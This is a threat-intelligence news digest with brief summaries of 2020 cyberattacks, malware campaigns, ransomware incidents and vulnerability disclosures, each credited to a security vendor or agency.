Daily Press

October 20, 2020

 

Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities

In a cybersecurity advisory, NSA has released 25 known public vulnerabilities being exploited by Chinese state-sponsored threat actors. The vulnerabilities affect a variety of products that facilitate defense contractors in remote access and external web services.

NSA Cybersecurity Advisory

October 20, 2020

 

Another Office 365 OAuth Attack Targets Coinbase Users to Gain Compromised Email Access

Researchers at KnowBe4 have discovered a new Consent app-based attack, designed to fool Office 365 users into giving mailbox access, instead of stealing credentials. The attacks target Coinbase digital currency exchange users with a phishing email desinged to look like a terms of service update.

KnowBe4

October 19, 2020

 

New Vizom Malware Discovered Targets Brazilian Bank Customers with Remote Overlay Attacks

A new malware variant has been discovered by researchers at IBM Security, dubbed Vizom by the team, targeting Brazilian bank account holders. The malware disguises itself as video conferencing software, spreads through spam-based phishing campaigns, and uses remote overlay techniques and DLL hijacking.

IBM

October 19, 2020

 

GravityRAT: The Spy Returns

In a new blog post, researchers at Kaspersky discuss the modifications in the active GravityRAT campaign, which is likely attributed to a Pakistani hacker group and targeting Indian armed forces. The most notable change since the 2015-2018 campaign is multi-platformity; specifically, the addition of Android and MacOS versions.

Kaspersky

October 14, 2020

 

FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

Mandiant researchers have identified a financially motivated threat group, now known as FIN11, whos activities may have been incorrectly attributed to TA505 in the past. While there are similarities in TTPs for both groups, the researchers feel there are enough differences that have been observed to now separate the groups.

Mandiant Threat Intelligence

October 13, 2020

 

Norway Says Russian Hackers Carried Out Breach at Parliament

According to Norwegian officials, Russian state-sponsored threat actors were responsible for attacks on the Norwegian parliament in August this year. The attacks targeted members of the Labour Party and Centre party, and according to the norwegian officials, the actors stole data from email accounts. No technical evidence has been released, and the Norwegian Police Security Service has stated that the investigation is ongoing.

CyberScoop

October 12, 2020

 

New Action to Combat Ransomware Ahead of U.S. Elections

Microsoft has teamed up with organizations including FS-ISAC, Symantec, and ESET to disable Trickbot, one of the world's most notorious botnets. Microsoft has used a court order granted in Virginia to cut off key infrastructure to those operating Trickbot, disrupting the ability to initiate new infections or activate ransomware.

Microsoft

October 12, 2020

 

Threat Landscape Trends: LOLBins, Operating Systems, and Threat Types

In part two of a blog series, Threat Landscape Trends, analyst Ben Nahorney of Cisco Security covers the most frequently encountered IoC alerts covering the first 6 months of 2020. The blog post covers the trend of using "living off the land" binaries, known as LOLBins.

Cisco Security

October 9, 2020

 

Ransomware Gang Now Using Critical Windows Flaw in Attacks

Threat group TA505 is exploiting the ZeroLogon vulnerability (CVE-2020-1472) in an updated version of Mimikatz with the purpose of giving hackers increased privileges on target systems and to run malicious scripts. TA505 have been active since 2014, attacking victims across a wide range of industries and distributing a variety of malware, including banking malware, backdoors, and ransomware.

Bleeping Computer

October 7, 2020

 

HP Device Manager Vulnerabilities May Allow Full System Takeover

Three HP Device Manager vulnerabilities (CVE-2020-6925, CVE-2020-6926, and CVE-2020-6927) can be used in tandem to achieve remote command execution by a threat actor. The vulnerabilities have been patched by HP, however a working exploit could be crafted if users have not updated systems.

Help Net Security

October 7, 2020

 

BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps

Researchers at Blackberry released a white paper today covering the threat group known as BAHAMUT; a sophisticated for-hire cyberespionage group known for their extremely technical capabilities in the growing culture of outsourced, third-party intelligence functions.

Blackberry

October 6, 2020

 

PoetRAT: Malware Targeting Public and Private Sector in Azerbaijan Evolves

The PoetRAT malware, initially identified in April 2020, has been seen targeting important organizations across Azerbaijan amidst violence in the Nagorno-Karabakh region. The actors behind the attacks, currently unidentified, have made PoetRAT harder to detect, implementing a new exfiltration protocol and obfuscation techniques to hide activities.

Cisco Talos

October 6, 2020

 

HEH, A New IoT P2P Botnet Going After Weak Telnet Services

A newly discovered botnet has been observed in the wild performing DDoS attacks and cryptomining. The botnet, named HEH Botnet, in written in Go and spreads via brute-force attack of the Telnet service on ports 23 or 2323, and can execute arbitrary shell commands.

360Netlab

October 5, 2020

 

Black-T: New Cryptojacking Variant from TeamTnT

Unit 42 has uncovered a new cryptojacking malware variant, dubbed Black-T, being used in operations by threat group TeamTnT. The threat group are targeting exposed Docker daemon APIs, and upon successful exploitation, dropping Black-T. TeamTnT is known for targeting AWS credential files and mining for Monero cryptocurrency.

Unit 42

October 5, 2020

 

Mobile Network Operator Falls Into The Hands of Fullz House Criminal Group

Boom! Mobile has fallen victim to a Magecart card-skimming attack by threat group Fullz House, also known as Magecart Group 4. The attack involves the injection of a Base64 encoded URL that loads a credit card skimmer designed to look like a Google Analytics element. The Boom! Mobile website is still compromised and online shoppers are still at risk.

Malwarebytes

October 5, 2020

 

Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?

Researchers at CyberArk Labs detail security vulnerabilities discovered in popular antivirus products. The vulnerabilities, which result from default Discretionary Access Control Lists (DACLs) for the ProgramData folder of Windows, can enable malicious actors to elevate privileges on a compromised system. Those antivirus solutions include those from Avira, Check Point, Fortinet, Kaspersky, McAfee, Microsoft Defender, Symantec, and Trend Micro, each of which has now been fixed by the vendor.

CyberArk

October 5, 2020

 

MosaicRegressor: Lurking in the Shadows of UEFI

A UEFI rootkit, dubbed MosaicRegressor by Kaspersky, has been discovered in the wild being used by a Chinese-speaking threat group during data theft and espionage operations. MosaicRegressor is only the second-ever identified UEFI rootkit, with the first being the LoJax rootkit discovered in 2018.

Kaspersky

September 25, 2020

 

German-Made FinSpy Spyware Found in Egypt, and Mac and Linux Versions Revealed

Amnesty International released details related to a malicious FinSpy surveillance campaign targeting Egyptian civil society organizations. FinSpy, a law enforcement software, has been used by what is believed to be an Egyptian state-sponsored hacking group since September 2019. The group has been targeting both desktop and mobile devices across Linux, macOS, Android, and Windows operating systems in order to gain hacking capabilities, such as intercepting calls, turning on webcams and microphones, and exfiltrating data.

Amnesty International

September 24, 2020

 

Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS

A critical code execution vulnerability in the Instagram app was discovered and patched in February, impacting the app for both Android and iOS (CVE-2020-1895). Researchers at Check Point Security have released details on how an attacker could leverage the vulnerability against users who have not yet updated their application since the patch release.

Check Point Security

September 24, 2020

 

Gadolinium - Detecting Empires in the Cloud

The Microsoft Threat Intelligence Center (MSTIC) recently detected spearphishing-initiated attacks within their networks by Chinese threat group Gadolinium, also known as APT40. The attacks prompted Microsoft to remove 18 Azure Active Directory applications from its portal that were impacted in the attack. MSTIC provides an analysis of the Gadolinium attack, as well as a deep dive into the tactics and techniques used by the threat group.

Microsoft

September 24, 2020

 

Federal Agency Compromised by Malicious Cyber Actor

An undisclosed US federal agency has fallen victim to a sophisticated multi-stage malware attack. The threat actors responsible for the attack obtained valid access credentials for multiple O365 accounts, and installed an SSH tunnel and reverse SOCKS proxy to maintain persistence on the network.

CISA

September 23, 2020

 

Case Study: Emotet Thread Hijacking, an Email Attack Technique

Emotet malspam is currently a common email-based threat, known for constantly updating to evade detection. In a case study, Unit 42 researchers show an example of Emotet thread hijacking, and discuss this technique in-depth.

Unit 42

September 23, 2020

 

Group-IB Detects Series of Ransomware Attacks by OldGremlin

A new Russian-speaking threat group known as OldGremlin are behind targeted spearphishing malware and ransomware attacks against Russian businesses, according to research by Group-IB. The attacks are especially unusual given the unspoken rule against targeting Russian entities from within Russia and post-Soviet countries, leading the researchers to believe the actors may be operating from within a post-Soviet nation with weak ties or political controversy with Russia.

Group-IB

September 22, 2020

 

APT28 Delivers Zebrocy Malware Campaign Using NATO Theme As Lure

An APT28 campaign targeting the government bodies of NATO members beginning in August 2020 as been identified by researchers at QuoIntelligence. APT28, a known Russian hacking group, has been tied to attacks against NATO members in the past.

QuoIntelligence

September 22, 2020

 

'DisrupTor' Dark-Web Crackdown Leads to 179 Arrests by International Law Enforcement

US and European law enforcement have announced the arrest of 179 alleged drug traffickers in Operation DisrupTor, an international sting operation targeting illicit underground commerce sites such as AlphaBay and Dream.

CyberScoop

September 21, 2020

 

New Snort, ClamAV Coverage Strikes Back Against Cobalt Strike

Cisco Talos gives an in-depth review of the framework behind a Cobalt Strike attack in a newly-released white paper. The research discusses the challenges behind covering Cobalt Strike attacks, and the mindset behind crafting effective Snort and ClamAV detection signatures to detect attempted obfuscation and exfiltration of data via Cobalt Strike.

Cisco Talos

September 18, 2020

 

Rampant Kitten – An Iranian Espionage Campaign

An on-going Iranian espionage campaign, dubbed Rampant Kitten, has been operating for at least six years, targeting Iranian minority groups on personal computers and mobile devices. In a deep dive of the campaign, researchers at Check Point Research outline attack vectors, tools, and methods used in the attacks.

Check Point Research

September 18, 2020

 

Leading U.S. Laser Developer IPG Photonics Hit With Ransomware

Fiber laser developer IPG Photonics has suffered a ransomware attack, shutting down worldwide IT systems for the business and halting manufacturing and shipping. The ransom note indicates that RansomExx, also known as Defray777, is responsible for the attack.

Bleeping Computer

September 17, 2020

 

Talos Vulnerability Report: Remote Code Execution Vulnerability Apple Safari

A remote code execution vulnerability (CVE-2020-9951) has been discovered and reported by Cisco Talos in an Apple Safari WebKit feature. Apple released security updates for Safari 14.0 today which includes a patch for the vulnerability.

Cisco Talos

September 17, 2020

 

Maze Gang Distributed Ransomware Payload Inside VM

The threat actors behind the Maze ransomware have conducted an attack adopting a Rangar Locker technique in which the ransomware payload is distributed inside of a virtual machine. The incident reported took place in July 2020, and was uncovered by researchers at Sophos MTR.

Sophos

September 17, 2020

 

Internet Explorer Now Warns of Adobe Flash's Upcoming Demise

Following the release of a Windows 10 cumulative update, Microsoft is reminding Internet Explorer users that Adobe Flash support is coming to an end, and that sites using Flash content will no longer be supported after December 2020.

Bleeping Computer

September 16, 2020

 

Seven International Cyber Defendants, Including “APT41” Actors, Charged

Seven cyber actors, all residents and nationals of the People's Republic of China, have been charged for their involvement in conducting computer network exploitations affecting more than 100 victim companies and organizations in the US and abroad. The threat actors are known to be affiliated with APT41. Two individuals have been arrested in Malaysia; the remaining five defendants are fugitives in China.

US Department of Justice

September 16, 2020

 

Spoofed Training Email from Phishing Simulator Company

Analysts at Cofense Intelligence have analyzed a security training-themed phishing campaign that has compromised at least 30 domains since April 2020. The phishing attacks aim to gather Microsoft Outlook credentials through malicious embedded links in the phishing emails.

Cofense

September 15, 2020

 

Rudeminer, Blacksquid and Lucifer Walk Into A Bar

Researchers at Check Point Research have found evidence that the threat actors behind Lucifer, a cryptojacking and DDoS hybrid malware that targets Windows, Linux, and IoT devices, started campaign operations in 2018. Data obtained through ThreatCloud shows recent Lucifer activity in the US, Ireland, the Netherlands, Turkey, and India, hitting over 25 organizations across industries including banking, manufacturing, and legal.

Check Point Research

September 15, 2020

 

Threat Analysis: URSA Trojan Impacts Many Countries Using Sophisticated Loader

In a deep dive analysis of the URSA trojan, researchers at Seguranca Informatica have dissected the malware used to target thousands of victims across Mexico and much of South America since June 2020. The URSA trojan is designed to collect banking credentials by creating a banking overlay window that the victim interacts with when visiting their home banking portal.

Seguranca Informatica

September 15, 2020

 

Data Breaches Exposes Vets, COVID-19 Patients

Recent data breaches at the US Department of Veteran Affairs and the UK National Health Service have impacted approximately 46,000 US veterans and 18,00 Welsh citizens.

Threatpost

September 14, 2020

 

Magento Stores Hit By Magecart; Largest Automated Hacking Attack Since 2015

Magecart credit card skimming attack targets eCommerce company Magento, compromising 1,904 Magento stores over the weekend.

Bleeping Computer

September 14, 2020

 

CISA Alert: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

The Cybersecurity and Infrastructure Security Agency (CISA) warns in an advisory that Chinese MSS-affiliated threat actors are targeting US government agencies and private companies by exploiting vulnerabilities in F5, Citrix, Pulse Secure, and Microsoft Exchange Server.

CISA - Alert (AA20-258A)

September 14, 2020

 

Virginia's Largest School System Hit With Ransomware

Fairfax County Public Schools, the largest public school system in Virginia, has confirmed a ransomware attack on its technology systems. The Maze ransomware group claims responsibility for the attack.

Dark Reading

September 11, 2020

 

Zerologon: Instantly Become Domain Admin by Subverting Netlogon Cryptography

Secura security researchers have published a test tool and white paper detailing CVE-2020-1472, a vulnerability that stems from a flaw in c cryptographic authentication scheme used by the Netlogon Remote Protocol. Microsoft has patched the vulnerability, and Secura urges all impacted users to install the patch on domain controllers as soon as possible.

Secura

September 10, 2020

 

Credential Phishing Attack Performs Real-Time AD Authentication

The Armorblox Threat Research Team has identified a phishing campaign that performed real-time validation against an undisclosed organization's Active Directory to harvest Office 365 credentials. The team provides a breakdown of the attack flow and of the infrastructure behind the attack.

Armorblox

September 10, 2020

 

Equinix Data Center Giant Hit by Netwalker Ransomware, $4.5M Ransom

International data center provider Equinix were hit with a Netwalker ransom attack over Labor Day weekend. The ransom note includes screenshots of data allegedly stolen, indicating theft of accounting and financial information for the business, as well as a 455 bitcoin demand.

Bleeping Computer

September 10, 2020

 

Razer Gaming Fans Caught Up in Data Leak

Due to a misconfigured Elasticsearch cloud cluster, an estimated 100K Razer Gaming customers may have had private information exposed to the public. The database contained customer information including full names, phone numbers, email addresses, order details, and more.

Threatpost

September 10, 2020

 

Who Is Calling? CDRThief Targets Linux VoIP Softswitches

Newly identified CDRThief malware has been discovered and analysed by ESET researchers. The malware is designed to target Linknat VOS2009 and VOS3000 Chinese VoIP platforms, with a primary goal of exfiltrating Call Detail Records (CDR) from a compromised softswitch.

ESET

September 9, 2020

 

Malvertising Campaigns Come Back in Full Swing

Malwarebytes Labs researchers uncover a large malvertising campaign targeting the highly-trafficed xHamster website. The team provides a deeper look into this campaign and modern malvertising.

Malwarebytes Labs

September 9, 2020

 

Java Network Launch Protocol - Another Way For Distributing Java Downloaders

Security researchers at Forcepoint X-Labs have identified a component in Java Network Launch Protocol (JNLP) that is actively being leveraged to automate malware download and execution.

Forcepoint

September 8, 2020

 

GhostDNSbusters

A dive into GhostDNS infrastructure and various elements of phishing targets and victimology, provided by researcher Nick Byers of Team Cymru and in collaboration with Manabu Niseki and CERT.br.

Team Cymru

September 8, 2020

 

TikTok Spyware

Researchers at Zscaler provide a detailed analysis into a spyware application masquerading as TikTok Pro.

Zscaler

September 8, 2020

 

Exposed Docker Server Abused to Drop Cryptominer, DDoS Bot

An attack that drops a DDoS bot and a cryptocurrency miner on a Docker container built using Alpine Linux as its base image has been reported by Trend Micro. A similar attack was reported in May this year, confirming that malicious actors continue targeting environments running Docker containers.

Trend Micro

July 31, 2020

 

WastedLocker: Technical Analysis

Garmin was the target of a ransomware attack in July 2020; a technical analysis by Kaspersky Labs indicates threat actors used the WastedLocker ransomware.

Kaspersky Labs

July 30, 2020

 

Cybercriminals Targeting Multiple Vulnerabilities in WordPress Plugins 

Researchers at Zscaler uncovered campaigns targeting WordPress vulnerabilities, exploiting them to perform malvertising activities.

Zscaler ThreatLabz

July 30, 2020

 

Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 

TrendLabs researchers discovered the Mirai Botnet exploiting critical BIG-IP vulnerabilities.

Trend Micro

July 30, 2020

 

Malspam Campaign Caught Using GuLoader After Service Relaunch

Following the July 11 relaunch of CloudEyE, an Italian security firm exposed in June as a front for malware operations, Malwarebytes Labs researchers observed GuLoader downloader malspam campaigns.

Malwarebytes Labs

July 29, 2020

 

Sneaky Doki Linux Malware Infiltrates Docker Cloud Instances 

Threat actors are targeting misconfigured Docker instances using Doki malware, a malware strand used in the Ngrok cryptominer botnet campaign.

Bleeping Computer

July 29, 2020

 

Android Spyware Targeting Tanzania Premier League 

Researchers at Zscaler discovered Android spyware impersonating legitimate fan applications for the Tanzania Mainland Premier League.

Zscaler ThreatLabZ

July 29, 2020

 

'Ghostwriter' Influence Campaign 

"Unknown Actors Leverage Website Compromises and Fabricated Content to Push Narratives Aligned With Russian Security Interests." The Mandiant Threat Intelligence team has released a white paper discussing connections within the "Ghostwriter" campaign.

Mandiant Threat Intelligence

July 29, 2020

 

Threat Actors Bypass Gateways with Google Ad Redirects

Cofense analysts have identified an Office 365 login credential phishing campaign which uses a Google Ad Services redirect to fool email gateways.

Cofense Phishing Defense Center

July 28, 2020

 

Chinese State-Sponsored Group ‘RedDelta’ Targets the Vatican and Catholic Organizations

Since May 2020, the Vatican and the Catholic Diocese of Hong Kong have been targeted by a Chinese-state sponsored threat activity group known as RedDelta.

Recorded Future - Insikt Group

July 28, 2020

 

Lazarus on the Hunt For Big Game

Researchers at Kaspersky Labs conclude that the MATA framework and VHD ransomware are both owned and operated by Lazarus.

Kaspersky Labs

July 27, 2020

 

Ensiko: A Webshell With Ransomware Capabilities

Trend Micro provides a deep-dive into Ensiko, a PHP web shell with ransomware capabilities.

Trend Micro